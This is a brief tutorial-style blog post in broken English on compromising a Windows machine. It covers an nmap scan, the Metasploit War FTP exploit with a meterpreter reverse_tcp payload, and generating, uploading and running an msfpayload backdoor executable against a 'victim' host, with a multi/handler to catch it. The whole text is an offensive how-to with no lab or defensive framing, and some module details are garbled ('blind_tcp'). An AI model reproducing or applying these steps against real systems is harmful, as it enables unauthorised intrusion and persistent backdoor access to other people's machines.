The first thing we do is see what ports are open using nmap.
can be seen in the picture. an open port that is 21'ftp', 135 'msrpc', 139 'netbios-ssn', 445'microsoft-ds.
on this occasion I will try to use port warftp
then we get into msfconsole, we find out about the war ftp. by writing the command search warftp. I use exploit/windows/ftp/warftpd_165_user.
Next we do the setting lhost, rhost, port.
I used the payload on windows/meterpreter/reverse_tcp.
then do a search target. target by using the show target command. I try to target 3.
Now do set targets and make exploitation.
then open a new console. We will send backdor.
write msfpayload -l
insert the command msfpayload windows/meterpreter/blind_tcp rport ="port_victim" rhost ="ip_addres_victim" > "name_payload.exe"
The next phase of return to our first console did upload payload we have made.
upload successfully ..
then open a new msfconsole. we will get into multi / handler.
type the following command: use exploit/multi/handler. and set payload.
back to meterpreter., perform execution payload we have sent
at the final stage of exploitation done on the multi / handler
Tidak ada komentar:
Posting Komentar